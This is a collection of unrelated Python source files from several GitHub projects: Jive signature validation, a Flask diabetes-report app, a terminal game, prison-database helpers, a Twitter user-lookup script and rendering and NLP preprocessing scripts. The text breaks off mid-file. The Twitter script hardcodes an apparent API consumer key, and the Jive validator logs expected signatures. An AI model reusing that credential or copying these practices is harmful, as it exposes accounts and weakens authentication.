# COMPILING THE BODY TO SEND TO THE MARKET TO VALIDATE
data = ''
for k,v in sorted(OrderedDict(data_json).items()):
data += k + ":" + v +"\n"
logging.debug("Signature Validation URL: [%s]", jiveSignatureURL)
logging.debug("Signature Data:\n%s", data)
res = requests.post(jiveSignatureURL, data=data, headers={ "X-Jive-MAC" : jiveSignature })
if res.status_code == 204:
logging.info("Validation Successful [%d]",res.status_code)
return True
logging.warn("Validation Failed [%d]", res.status_code)
return False
#############################################
# is_valid_authorization
#############################################
def is_valid_authorization(authorization, clientId, clientSecret):
"""
This method implements the Jive logic to validate a signed-fetch request from the OpenSocial container in Jive request.
Arguments:
1) authorization (REQUIRED) - the value of the "Authorization" header on the request
2) clientId (REQUIRED) - the shared clientId for the add-on
3) clientSecret (REQUIRED) - the clientSecret for the add-on
Examples of calls to this method include:
jive_sdk.is_valid_authorization(your_authorization_header,your_clientId,your_clientSecret)
For more details, check out the Jive Developer Community
https://community.jivesoftware.com/docs/DOC-99941
https://community.jivesoftware.com/docs/DOC-156557
https://community.jivesoftware.com/docs/DOC-163586
"""
if not authorization:
logging.warn("Invalid Authorization (null/empty)")
return False
fields = authorization.split(' ')
if fields[0] != "JiveEXTN":
logging.warn("Invalid Authorization Type [%s]",fields[0])
return False
if not fields[1]:
logging.warn("Invalid Parameters [None]")
return False
flag = fields[0]
message = ''
signature = ''
for kv in fields[1].split('&'):
key, value = kv.split("=")
if (key == "client_id" and value != clientId):
logging.warn("ClientId [%s] did not match expected ClientId [%s]",key,clientId)
return False
elif key == "signature":
signature = urllib.unquote(value).decode()
else:
message += "&" + key + "=" + value
message = message[1:]
# REMOVING SUFFIX FOR PROPER BASE64 DECODE
if clientSecret.endswith(".s"):
clientSecret = clientSecret[:-2]
# PROCESSING EXPECTING SIGNATURE
secret = base64.b64decode(clientSecret)
dig = hmac.new(secret, msg=message, digestmod=hashlib.sha256).digest()
expectedSignature = base64.b64encode(dig).decode();
expectedSignature = urllib.unquote(expectedSignature).decode()
# DO THE FINAL SIGNATURE COMPARISON
if signature != expectedSignature:
logging.warn("Signatures did NOT match! [expected: %s] [actual: %s]",expectedSignature, signature)
return False
return True
``` |
{
"source": "Jivi2478/SNF",
"score": 2
} |
#### File: Jivi2478/SNF/app.py
```python
from flask import Flask, render_template, request,redirect
from flask import send_file, send_from_directory, safe_join, abort
from flask.helpers import url_for
from generate_report import *
import os
print(os.getcwd())
from sklearn.model_selection import train_test_split
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
app = Flask(__name__)
app.config.from_object('config')
#db = SQLAlchemy(app)
# Automatically tear down SQLAlchemy.
'''
@app.teardown_request
def shutdown_session(exception=None):
db_session.remove()
'''
# Login required decorator.
'''
def login_required(test):
@wraps(test)
def wrap(*args, **kwargs):
if 'logged_in' in session:
return test(*args, **kwargs)
else:
flash('You need to login first.')
return redirect(url_for('login'))
return wrap
'''
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route('/',methods=['GET','POST'])
def home():
return render_template('pages/SNF.html')
@app.route('/download', methods=['GET', 'POST'])
def download():
global user_details
if(request.method == 'POST'):
print("Test")
user_details= {
"Name":request.form.get("name"),
"Gender":request.form.get("gender"),
"Age":request.form.get("age"),
"Pregnancies":request.form.get("pregnancies"),
"Glucose":request.form.get("glucose"),
"Bloodpressure":request.form.get("bloodpressure"),
"Skinthickness":request.form.get("skinthickness"),
"Insulin":request.form.get("insulin"),
"BMI":request.form.get('bmi'),
"Diabetes Pedigree Function":request.form.get('dpf'),
"Email Address":request.form.get('email')
#"Gender":request.form.get("gender"),
#"Diagnosis":request.form.get("Diagnosis"),
#"Analysis":request.form.get("disease"),
#"Image":""
}
print(user_details)
report = Report()
report.generate_report(user_details) #Added change here
return redirect('/')
return redirect('/')
#return send_from_directory(directory="./reports", filename="report.pdf")
#IMAGE INPUT
#@<EMAIL>("/analyze_img",methods=['POST','GET'])
#def analyze_img():
#if(request.method == 'POST'):
#if(request.files):
#report.refresh()
#img = request.files['image']
#img.save(os.path.join("./static/images",img.filename))
#user_details['Image'] = img.filename
#print(user_details)
#report.generate_report(user_details)
#test_img = cv2.imread(os.path.join(app.config['IMAGE_UPLOADS'], img.filename))
#return redirect('user')
@app.route('/about')
def about():
return render_template('pages/placeholder.about.html')
# @app.route('/login')
# def login():
# form = LoginForm(request.form)
# return render_template('forms/login.html', form=form)
# @app.route('/register')
# def register():
# form = RegisterForm(request.form)
# return render_template('forms/register.html', form=form)
# @app.route('/forgot')
# def forgot():
# form = ForgotForm(request.form)
# return render_template('forms/forgot.html', form=form)
# Error handlers.
# @app.errorhandler(500)
# def internal_error(error):
# #db_session.rollback()
# return render_template('errors/500.html'), 500
# @app.errorhandler(404)
# def not_found_error(error):
# return render_template('errors/404.html'), 404
# if not app.debug:
# file_handler = FileHandler('error.log')
# file_handler.setFormatter(
# Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')
# )
# app.logger.setLevel(logging.INFO)
# file_handler.setLevel(logging.INFO)
# app.logger.addHandler(file_handler)
# app.logger.info('errors')
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port - PORT:3000:
if __name__ == '__main__':
app.run()
```
#### File: Jivi2478/SNF/generate_report.py
```python
from fpdf import FPDF
import pandas as pd
import os
import joblib
from sklearn.metrics import accuracy_score
from sklearn import metrics
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
class SNF_Detect:
# Directories for Model --> Change if subdirectories created
CURR_DIR = os.getcwd()
model_dir = "./Model/savedmodel.pkl"
def __init__(self):
self.clf = joblib.load(self.model_dir)
def predict(self):
df=pd.read_csv('./Model/content/diabetes.csv')
X=df.drop('Outcome',axis=1)
y=df['Outcome']
X_train, X_test, y_train, y_test = train_test_split(X, y,test_size=0.2,random_state=0)
sc_x=StandardScaler()
X_train=sc_x.fit_transform(X_train)
X_test=sc_x.transform(X_test)
knn=KNeighborsClassifier(n_neighbors=5,metric='euclidean',p=2)
knn.fit(X_train,y_train)
target_names = ['Diabetes', 'Normal']
y_pred = knn.predict(X_test)
return(classification_report(y_test, y_pred, target_names=target_names,output_dict=True))
def save_model(self):
print("Saving the model")
return
class Report:
# Creating pdf object
pdf = None
# inx declaration
inx = 60
def __init__(self):
# format ('A3','A4','Letter','Legal')
self.pdf = FPDF('P','mm','A4')
# Adding a page to the pdf file
self.pdf.add_page()
# Setting up font
self.pdf.set_font('helvetica','',16)
def header(self):
# Arial bold 15
self.pdf.set_font('Arial', 'B', 15)
# Move to the right
self.pdf.cell(46)
# Title
self.pdf.cell(90, 20, 'MEDICAL REPORT', 1, 0, 'C')
# Logo
self.pdf.image('./static/images/dl.jpg', 170, 4, 33)
self.pdf.line(0, 40,220,40)
# Line break
self.pdf.ln(20)
def insert_text(self,user_details):
# Add Text
# w = width
# h = height
# Adding Title
# for key,value
inx = self.inx
for key,value in user_details.items():
self.pdf.cell(0,inx,key + " : " + value)
self.pdf.ln(2)
inx+=5
self.pdf.ln(1)
inx+=5
self.inx = inx
def generate_report(self,user_details):
# print(os.getcwd())
self.header()
model = SNF_Detect()
classification_report = model.predict()
print(classification_report)
# Setting up Personal Details header
self.pdf.cell(90,self.inx,"PERSONAL DETAILS")
self.pdf.ln(10)
self.insert_text(
{
"Name":user_details["Name"],
"Gender":user_details["Gender"],
"Age":user_details["Age"],
"Pregnancies":user_details["Pregnancies"],
"Glucose":user_details["Glucose"],
"Blood Pressure":user_details["Bloodpressure"],
"Skin Thickness":user_details["Skinthickness"],
"Insulin":user_details["Insulin"],
"BMI":user_details["BMI"],
"Diabetes Pedigree Function":user_details["Diabetes Pedigree Function"],
"Email ID":user_details["Email Address"]
}
)
self.pdf.cell(0,self.inx,"ANALYSIS")
self.pdf.line(0,120,220,120)#Horizontal Line
self.pdf.ln(10)#Horizontal space
#{'Diabetes': {'precision': 0.8454545454545455, 'recall': 0.8691588785046729, 'f1-score': 0.8571428571428571, 'support': 107}, 'Normal': {'precision': 0.6818181818181818, 'recall': 0.6382978723404256, 'f1-score': 0.6593406593406593, 'support': 47}, 'accuracy': 0.7987012987012987, 'macro avg': {'precision': 0.7636363636363637, 'recall': 0.7537283754225492, 'f1-score': 0.7582417582417582, 'support': 154}, 'weighted avg': {'precision': 0.7955135773317591, 'recall': 0.7987012987012987, 'f1-score': 0.796774653917511, 'support': 154}}
self.pdf.cell(0,self.inx,"DIABETES")
self.pdf.ln(4)#2
self.inx += 5
self.insert_text(
{
"precision":" 0.8454545454545455",
"recall":" 0.8691588785046729",
"f1-score":"0.8571428571428571",
"support": "107"
}
)
#self.pdf.line(0,200,220,200) SELF NORMAL COMES IN NEXT LINE
self.pdf.cell(0,self.inx,"NORMAL")
self.pdf.ln(3)
self.inx += 5
self.insert_text(
{
"precision":"0.6818181818181818",
"recall":" 0.6382978723404256",
"f1-score":"0.6593406593406593",
"support": "47"
}
)
self.pdf.ln(16)
self.pdf.output('./report.pdf')
def refresh(self):
# format ('A3','A4','Letter','Legal')
self.pdf = FPDF('P','mm','A4')
# Adding a page to the pdf file
self.pdf.add_page()
# Setting up font
self.pdf.set_font('helvetica','',16)
# if __name__ == '__main__':
# report = Report()
# report.generate_report()
``` |
{
"source": "jivid/plexmonitor",
"score": 3
} |
#### File: plexmonitor/plexmonitor/handlers.py
```python
from functools import wraps
from typing import Callable, Any, Union
from plexmonitor.lib.command import Command
# TODO(divij): I can't yet figure out what the return type of handler functions
# should be, so just use Any for now
HandlerFuncType = Callable[[Command], Any]
__all__ = ['get_handler_for_action']
_registry = {} # type: Dict[str, HandlerFuncType]
def get_handler_for_action(action: str) -> Union[HandlerFuncType, None]:
""" Get a handler from the registry
"""
return _registry.get(action)
def handles(action: str) -> Callable[[HandlerFuncType], Any]:
""" Simple decorator to add a function to the handler registry. It takes as
an argument the action the function handles.
If many functions handle the same action, only the first is registered
"""
def wrapper(func: HandlerFuncType):
@wraps(func)
def wrapped_func(command: Command):
if not isinstance(command, Command):
raise RuntimeError("{} is not an instance of Command"
.format(command))
return func(command)
# Register just the first function and ensure that the wrapped
# function is registered, not the raw one
if action not in _registry:
_registry[action] = wrapped_func
return wrapped_func
return wrapper
@handles('status')
def get_system_status(cmd):
print("Checking system status")
```
#### File: plexmonitor/tasks/email_task.py
```python
import email
from sparts.tasks.periodic import PeriodicTask # type: ignore
from plexmonitor.lib.command import Command
from plexmonitor.lib.email import Inbox
class EmailTask(PeriodicTask):
""" Periodic task to read the email inbox and scan for new commands.
To prevent against potential DOS, the task will only look at one email
per iteration, the most recent one. If the most recent mail has already
been processed, the iteration will be a no-op.
"""
INTERVAL = 10.0
def initTask(self) -> None:
super(EmailTask, self).initTask()
self.inbox = Inbox()
self.inbox.connect()
self.last_mail_id = None # type: str
def execute(self) -> None:
last_unread = self.inbox.get_last_unread_mail_id()
last_processed = self.last_mail_id
if last_processed is not None and\
int(last_unread) <= int(last_processed):
self.logger.info("Nothing to fetch")
return
self.logger.info("Going to fetch mail ID {}".format(last_unread))
mail = self.inbox.fetch(last_unread) # type: email.message.Message
self.last_mail_id = last_unread
cmd = Command.from_email(mail)
if not cmd:
self.logger.info("No valid command")
return
self.logger.info("Got command {action} from {sender}"
.format(action=cmd.action,
sender=cmd.context['sender']))
``` |
{
"source": "jiviteshjain/cast-away",
"score": 3
} |
#### File: jiviteshjain/cast-away/mandalorian.py
```python
import os
import numpy as np
from colorama import init as cinit
from colorama import Fore, Back, Style
import random
from time import monotonic as clock
import config as conf
from thing import Thing
class Mandalorian(Thing):
def __init__(self, game_height, game_width, y=0):
super().__init__(game_height, game_width, np.array([game_height - conf.GND_HEIGHT - 4, y]), np.array([4, 3]))
self._acc = np.array([conf.GRAVITY_X, conf.GRAVITY_Y])
self._repr = np.array([
[' ', Fore.CYAN + Style.BRIGHT + '_', ' '],
[Fore.CYAN + Style.BRIGHT + '|', Fore.GREEN +
Style.BRIGHT + 'O', Fore.CYAN + Style.BRIGHT + '`'],
[Fore.CYAN + Style.BRIGHT + '[', Style.BRIGHT + Back.GREEN + ' ', Fore.CYAN + Style.BRIGHT + ']'],
[' ', Fore.CYAN + Style.BRIGHT + 'J', Fore.CYAN + Style.BRIGHT + 'L']
], dtype='object')
self._repr_shield = np.array([
[' ', Fore.CYAN + Style.BRIGHT + '_', ' '],
[Fore.CYAN + Style.BRIGHT + '|', Fore.GREEN +
Style.BRIGHT + 'O', Fore.CYAN + Style.BRIGHT + '`'],
[Fore.CYAN + Style.BRIGHT + '[', Style.BRIGHT +
Back.BLACK + ' ', Fore.CYAN + Style.BRIGHT + ']'],
[' ', Fore.CYAN + Style.BRIGHT + 'J', Fore.CYAN + Style.BRIGHT + 'L']
], dtype='object')
self._shield = False
def is_out(self):
'''
overriden to return false as soon as any part of the object goes off screen, because mandalorian can not go off screen
'''
# T, L, B, R
return (self._pos[0] < 0), (self._pos[1] < 0), (self._pos[0] + self._size[0] - 1 >= self._game_h), (self._pos[1] + self._size[1] - 1 >= self._game_w)
def show(self):
'''
overriden to accomodate shield
'''
if not self._shield:
return np.round(self._pos).astype(np.int32), self._size, self._repr
else:
return np.round(self._pos).astype(np.int32), self._size, self._repr_shield
def set_shield(self, what):
if type(what) != bool:
raise ValueError
self._shield = what
def nudge(self, key):
if key == 'w':
self._acc[0] -= conf.KEY_FORCE
elif key == 'a':
self._acc[1] -= conf.KEY_FORCE
elif key == 'd':
self._acc[1] += conf.KEY_FORCE
def reset_acc(self):
'''
overriden to accomodate gravity and drag force
'''
super().reset_acc()
self._acc[0] += conf.GRAVITY_X
self._acc[1] += conf.GRAVITY_Y
# drag force added so that velocity changes due to user inputs do not accumulate
# drag force tends to align the player's velocities to the game's velocity
if (self._vel[1] + conf.GAME_SPEED) > 0:
drag = -conf.DRAG_COEFF * ((self._vel[1] + conf.GAME_SPEED)** 2)
else:
drag = conf.DRAG_COEFF * ((self._vel[1] + conf.GAME_SPEED)** 2)
self._acc[1] += drag
def move(self):
super().move()
t, l, b, r = self.is_out() # don't let it go out
if l:
if self._vel[1] < 0:
self._pos[1] = 0
self._vel[1] = 0
if self._acc[1] < 0:
self._acc[1] = 0
if r:
if self._vel[1] > 0:
self._pos[1] = self._game_w - self._size[1]
self._vel[1] = 0
if self._acc[1] > 0:
self._acc[1] = 0
``` |
{
"source": "jiviteshjain/da-phase-4",
"score": 4
} |
#### File: jiviteshjain/da-phase-4/delete.py
```python
def delete_prisoner(cur, con):
try:
print("Enter ID of prisoner you want to delete")
id = int(input())
query = "delete from Prisoners where id = %d ;" % (id)
cur.execute(query)
con.commit()
print("Deleted prisoner")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_job(cur, con):
try:
print("Enter ID of job you want to delete")
id = int(input())
query = "delete from Jobs where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted job")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_staff(cur, con):
try:
print("Enter ID of the staff member you want to delete")
id = int(input())
query = "delete from Prison_Staff where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted staff member")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_offence(cur, con):
try:
print("Enter ID of the offence you want to delete")
id = int(input())
query = "delete from Offences where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted offence")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
def delete_appeal(cur, con):
try:
print("Enter ID of the appeal you want to delete")
id = int(input())
query = "delete from Appeals where id = %d ; " % (id)
cur.execute(query)
con.commit()
print("Deleted appeal")
input("Press any key to continue")
except Exception as e:
con.rollback()
print("Failed to delete from database")
print(">>>>>>>>>>>>>", e)
input("Press any key to continue")
return
``` |
{
"source": "jiviteshjain/github-slideshow",
"score": 3
} |
#### File: jiviteshjain/github-slideshow/journalists_twitter.py
```python
import json
import tweepy
from pprint import pprint
import tqdm
# %%
CONSUMER_KEY = "SL5KvNaqmVjJ4XsibIpLxLYLu"
CONSUMER_KEY_SECRET = "<KEY>"
ACCESS_TOKEN = "<KEY>"
ACCESS_TOKEN_SECRET = "<KEY>"
# %%
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_KEY_SECRET)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
redirect_url = auth.get_authorization_url()
print(redirect_url)
# %%
auth.get_access_token('0<PASSWORD>')
# %%
with open('journalists.json', 'r') as f:
koo_users = json.load(f)
# %%
def search_user(name):
res = api.search_users(q=name, tweet_mode='extended')
if len(res) == 0:
return None
return res[0]
# %%
class User:
def __init__(self, koo_user, twitter_user):
self.koo_user = koo_user
self.twitter_user = twitter_user
def print(self):
if self.twitter_user is None:
return f"{self.koo_user['name']}\t{self.koo_user['userHandle']}\t\t\t{self.koo_user['followerCount']}\t{self.koo_user['badgeType']}\n"
else:
return f"{self.koo_user['name']}\t{self.koo_user['userHandle']}\t{self.twitter_user.name}\t{self.twitter_user.screen_name}\t{self.koo_user['followerCount']}\t{self.koo_user['badgeType']}\n"
@classmethod
def schema(cls):
return "Koo Name\tKoo Handle\tTwitter Name\tTwitter Handle\t# Followers on Koo\tVerified on Koo\n"
# %%
users = []
# %%
for koo_user in tqdm.tqdm(koo_users):
twitter_user = search_user(koo_user['name'])
users.append(User(koo_user, twitter_user))
# %%
with open('journalists_twitter.json', 'w') as f:
json.dump([u.twitter_user._json if u.twitter_user else None for u in users], f)
# %%
with open('journalists.tsv', 'w') as f:
f.write(User.schema())
for user in users:
f.write(user.print())
# %%
``` |
{
"source": "jiviteshjain/render-mitsuba",
"score": 3
} |
#### File: jiviteshjain/render-mitsuba/copy_files.py
```python
import shutil
import argparse
import os
parser = argparse.ArgumentParser()
parser.add_argument('--path', type=str, required=True)
parser.add_argument('--start', type=int, default=0, required=False)
parser.add_argument('--end', type=int, required=True)
parser.add_argument('--stops', type=int, default=3)
args = parser.parse_args()
class PathManager:
def __init__(self, path):
self.dirname = os.path.dirname(path)
basename = os.path.basename(path)
self.filename, self.ext = os.path.splitext(basename)
print(self.dirname, basename, self.filename, self.ext)
def get(self, num):
return os.path.join(self.dirname, f'{self.filename}{str(num).zfill(3)}{self.ext}')
paths = PathManager(args.path)
num = args.end + 1
for _ in range(args.stops):
shutil.copy2(paths.get(args.end), paths.get(num))
num += 1
for i in range(args.end, args.start + 1, -1):
shutil.copy2(paths.get(i), paths.get(num))
num += 1
for _ in range(args.stops):
shutil.copy2(paths.get(args.start), paths.get(num))
num += 1
```
#### File: jiviteshjain/render-mitsuba/render_video.py
```python
from render_for_video import Renderer
from argparse import ArgumentParser
import os
import re
import time
import numpy as np
#1,1,0.9 0.5,1.5,4.5
#1,1,1.5 0.7,1,4.5
#-0.1,-0.1,2.4 1,1,2
#0.9,0.9,2
# 1.5,1.5,2.7
XML_HEAD = """
<scene version="0.6.0">
<integrator type="path">
<integer name="maxDepth" value="-1"/>
</integrator>
<sensor type="perspective">
<float name="farClip" value="100"/>
<float name="nearClip" value="0.1"/>
<transform name="toWorld">
<lookat origin="1.4,1.4,2.5" target="0,0,0" up="0,0,1"/>
</transform>
<float name="fov" value="25"/>
<sampler type="ldsampler">
<integer name="sampleCount" value="1024"/>
</sampler>
<film type="hdrfilm">
<integer name="width" value="1920"/>
<integer name="height" value="1080"/>
<rfilter type="gaussian"/>
</film>
</sensor>
<bsdf type="roughplastic" id="surfaceMaterial">
<string name="distribution" value="ggx"/>
<float name="alpha" value="0.05"/>
<float name="intIOR" value="1.46"/>
<rgb name="diffuseReflectance" value="1,1,1"/> <!-- default 0.5 -->
</bsdf>
<bsdf type="plastic" id="surfaceMaterial2">
<float name="intIOR" value="1.46"/>
<rgb name="diffuseReflectance" value="1,1,1"/> <!-- default 0.5 -->
</bsdf>
"""
XML_TAIL = """
<shape type="rectangle">
<ref name="bsdf" id="surfaceMaterial"/>
<transform name="toWorld">
<scale x="10" y="10" z="1"/>
<lookat origin="0,0,-0.1" target="-2.5,-2.5,10" up="0,0,1"/>
</transform>
</shape>
<shape type="sphere">
<float name="radius" value="1.6"/>
<transform name="toWorld">
<translate x="0" y="0" z="5"/>
</transform>
<emitter type="area">
<rgb name="radiance" value="11,11,11"/>
</emitter>
</shape>
<emitter type="constant">
<rgb name="radiance" value="0.18,0.18,0.18"/>
</emitter>
</scene>
"""
XML_SPHERE = """
<shape type="sphere">
<float name="radius" value="{radius}"/>
<transform name="toWorld">
<translate x="{x}" y="{y}" z="{z}"/>
</transform>
<bsdf type="diffuse">
<rgb name="reflectance" value="{r},{g},{b}"/>
</bsdf>
</shape>
"""
ROW_DIR = np.array([-3, 3, 0], dtype=np.float32)
ROW_DIR /= np.linalg.norm(ROW_DIR)
COL_DIR = np.array([3, 3, -1.5], dtype=np.float32)
COL_DIR /= np.linalg.norm(COL_DIR)
ROT_DIR = np.cross(ROW_DIR, COL_DIR)
ROW_DIR = ROW_DIR[(1, 2, 0), ]
ROW_DIR[0] *= -1
ROT_DIR = ROT_DIR[(1, 2, 0), ]
ROT_DIR[0] *= -1
COL_DIR = COL_DIR[(1, 2, 0), ]
COL_DIR[0] *= -1
print(ROW_DIR, COL_DIR)
Rs = []
Ss = [
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera FocalMm="32.833435" TranslationVector="0.664746 -2.25634 -0.372164 1" ViewportPx="1577 1027" CenterPx="788 513" CameraType="0" BinaryData="0" LensDistortion="0 0" PixelSizeMm="0.0369161 0.0369161" RotationMatrix="0.727616 0.0788547 0.681437 0 0.643869 0.264198 -0.718076 0 -0.236658 0.96124 0.141462 0 0 0 0 1 "/>
<ViewSettings NearPlane="0.30310887" FarPlane="7.4027324" TrackScale="1.245262"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera BinaryData="0" CameraType="0" ViewportPx="1577 1027" PixelSizeMm="0.0369161 0.0369161" LensDistortion="0 0" RotationMatrix="-0.275013 0.772173 0.572815 0 -0.95127 -0.304969 -0.0456044 0 0.139476 -0.557444 0.818415 0 0 0 0 1 " FocalMm="32.833454" TranslationVector="-0.49805 1.43134 -2.11628 1" CenterPx="788 513"/>
<ViewSettings TrackScale="1.1246486" NearPlane="0.30310887" FarPlane="8.6538372"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera BinaryData="0" FocalMm="32.833454" LensDistortion="0 0" TranslationVector="1.41071 0.41359 -1.67635 1" CenterPx="788 513" RotationMatrix="-0.673956 -0.396539 -0.62333 0 0.434634 -0.895095 0.099491 0 -0.597392 -0.203868 0.775604 0 0 0 0 1 " PixelSizeMm="0.0369161 0.0369161" ViewportPx="1577 1027" CameraType="0"/>
<ViewSettings NearPlane="0.30310887" FarPlane="8.6567221" TrackScale="1.3598638"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera CameraType="0" LensDistortion="0 0" PixelSizeMm="0.0369161 0.0369161" TranslationVector="-0.791357 -1.14453 1.85737 1" CenterPx="788 513" ViewportPx="1577 1027" BinaryData="0" RotationMatrix="-0.449984 -0.653999 -0.608112 0 -0.80566 0.59106 -0.0394969 0 0.385262 0.472159 -0.792868 0 0 0 0 1 " FocalMm="32.833454"/>
<ViewSettings FarPlane="8.79844" NearPlane="0.30310887" TrackScale="1.3827369"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera FocalMm="32.833435" TranslationVector="0.664746 -2.25634 -0.372164 1" ViewportPx="1577 1027" CenterPx="788 513" CameraType="0" BinaryData="0" LensDistortion="0 0" PixelSizeMm="0.0369161 0.0369161" RotationMatrix="0.727616 0.0788547 0.681437 0 0.643869 0.264198 -0.718076 0 -0.236658 0.96124 0.141462 0 0 0 0 1 "/>
<ViewSettings NearPlane="0.30310887" FarPlane="7.4027324" TrackScale="1.245262"/>
</project>
""",
"""
<!DOCTYPE ViewState>
<project>
<VCGCamera BinaryData="0" FocalMm="32.833454" LensDistortion="0 0" TranslationVector="1.41071 0.41359 -1.67635 1" CenterPx="788 513" RotationMatrix="-0.673956 -0.396539 -0.62333 0 0.434634 -0.895095 0.099491 0 -0.597392 -0.203868 0.775604 0 0 0 0 1 " PixelSizeMm="0.0369161 0.0369161" ViewportPx="1577 1027" CameraType="0"/>
<ViewSettings NearPlane="0.30310887" FarPlane="8.6567221" TrackScale="1.3598638"/>
</project>
""",
]
# rotation_string = ""
for rotation_string in Ss:
if rotation_string.strip() == '':
R = np.eye(3)
else:
match = re.search(r'RotationMatrix=".*0 0 0 1 "', rotation_string)
s = str(match.group(0))
elements = [float(x) for x in s.split('=')[1].strip('"').split()]
R = np.array(elements).reshape((4, 4))
R = R[:3, :3].T
Rs.append(R)
def parse_args():
parser = ArgumentParser()
parser.add_argument('--self_color_files', type=str, nargs='+', default=[])
parser.add_argument('--default_color_files', type=str, nargs='+', default=[])
parser.add_argument('--bg_color_files', type=str, nargs='+', default=[])
parser.add_argument('--radius', type=float, default=0.020 * 2)
parser.add_argument('--spacing', type=float, default=2.5)
parser.add_argument('--mitsuba', type=str, default='/Users/jiviteshjain/Installs/mitsuba2/build/dist/mitsuba', help='Path to mitsuba2 installation.')
parser.add_argument('--out_file', type=str, required=True, help='Output file path.')
parser.add_argument('--in_dir', type=str, default='', help='Optional path prefex for input files.')
return parser.parse_args()
def run(args, frame_id, angle, box=None):
out_folder = os.path.dirname(args.out_file)
out_file = os.path.basename(args.out_file)
out_file_name, out_file_ext = os.path.splitext(out_file)
out_file_name += str(frame_id).zfill(3)
out_file_path = os.path.join(out_folder, out_file_name + out_file_ext)
renderer = Renderer(args.mitsuba, args.radius * 0.5, args.radius, 600, out_file_path, XML_HEAD, XML_TAIL, XML_SPHERE, scale_radius=True)
for i, file in enumerate(args.self_color_files):
if i != 100:
renderer.add_pcd(os.path.join(args.in_dir, file), 'self', Rs[i // 4])
else:
renderer.add_pcd(os.path.join(args.in_dir, file), 'self', Rs[0])
renderer.preprocess_grid(ROW_DIR, COL_DIR, args.spacing * 1, args.spacing * 1.1)
for i, file in enumerate(args.default_color_files):
if i != 100:
renderer.add_pcd(os.path.join(args.in_dir, file), 'default', Rs[i // 4])
else:
renderer.add_pcd(os.path.join(args.in_dir, file), 'default', np.eye(3))
renderer.preprocess_grid(ROW_DIR, COL_DIR, args.spacing * 1, args.spacing * 1.1, offset=len(args.self_color_files))
for i, file in enumerate(args.bg_color_files):
if i != 100:
renderer.add_pcd(os.path.join(args.in_dir, file), 'bg', Rs[i // 4])
else:
renderer.add_pcd(os.path.join(args.in_dir, file), 'bg', Rs[0])
renderer.preprocess_grid(ROW_DIR, COL_DIR, args.spacing * 1, args.spacing * 1.1, offset=len(args.self_color_files)+len(args.default_color_files))
# renderer.process(np.array([0, 0, 1], dtype=np.float32), angle)
return renderer.process(-ROT_DIR, angle, box)
if __name__ == '__main__':
args = parse_args()
box = None
for frame_id, angle in enumerate(np.linspace(start=-0.698132, stop=0.698132, num=150)[1:]):
print('FRAME:', frame_id)
box = run(args, frame_id, angle, box)
# break
if frame_id % 5 == 0:
print('SLEEP')
time.sleep(2)
``` |
{
"source": "jiviteshjain/why-cite",
"score": 3
} |
#### File: evaluation/similarity/test_sim.py
```python
import torch
from style_paraphrase.evaluation.similarity.sim_models import WordAveraging
from style_paraphrase.evaluation.similarity.sim_utils import Example
from nltk.tokenize import TreebankWordTokenizer
import sentencepiece as spm
tok = TreebankWordTokenizer()
model = torch.load('style_paraphrase/evaluation/similarity/sim/sim.pt')
state_dict = model['state_dict']
vocab_words = model['vocab_words']
args = model['args']
# turn off gpu
model = WordAveraging(args, vocab_words)
model.load_state_dict(state_dict, strict=True)
sp = spm.SentencePieceProcessor()
sp.Load('style_paraphrase/evaluation/similarity/sim/sim.sp.30k.model')
model.eval()
def make_example(sentence, model):
sentence = sentence.lower()
sentence = " ".join(tok.tokenize(sentence))
sentence = sp.EncodeAsPieces(sentence)
wp1 = Example(" ".join(sentence))
wp1.populate_embeddings(model.vocab)
return wp1
def find_similarity(s1, s2):
with torch.no_grad():
s1 = [make_example(x, model) for x in s1]
s2 = [make_example(x, model) for x in s2]
wx1, wl1, wm1 = model.torchify_batch(s1)
wx2, wl2, wm2 = model.torchify_batch(s2)
scores = model.scoring_function(wx1, wm1, wl1, wx2, wm2, wl2)
return [x.item() for x in scores]
# s1 = "the dog ran outsideddd."
# s2 = "the puppy escape into the trees."
# print(find_similarity([s1, s2], [s2, s2]))
```
#### File: src/scripts/preprocess_aclarc.py
```python
import re
import jsonlines
file_names = [
"dev.jsonl",
"train.jsonl",
"test.jsonl"
]
def process_json(data):
text = data['text']
extended = data['extended_context']
cleaned = data['cleaned_cite_text']
new_text = extended.replace(text, cleaned)
data['extended_context'] = new_text
return data
if __name__ == '__main__':
for file_name in file_names:
instances = list(jsonlines.open(f"../../data/acl-arc/{file_name}"))
new_instances = list(map(process_json, instances))
f = open(f"../../data/acl-arc/processed_{file_name}", "w")
writer = jsonlines.Writer(f)
writer.write_all(new_instances)
f.close()
# print(new_instances[0]['extended_context'])
```
#### File: src/scripts/sectionNames_scicitetest.py
```python
import re
import numpy as np
import jsonlines
file_names = [
"dev.jsonl",
"train.jsonl",
"test.jsonl"
]
def process_json(data):
extended = data['sectionName']
print(extended)
try:
if("discussion" in extended.lower()):
print("yes")
data['sectionName'] = "discussion"
elif("introduction" in extended.lower()):
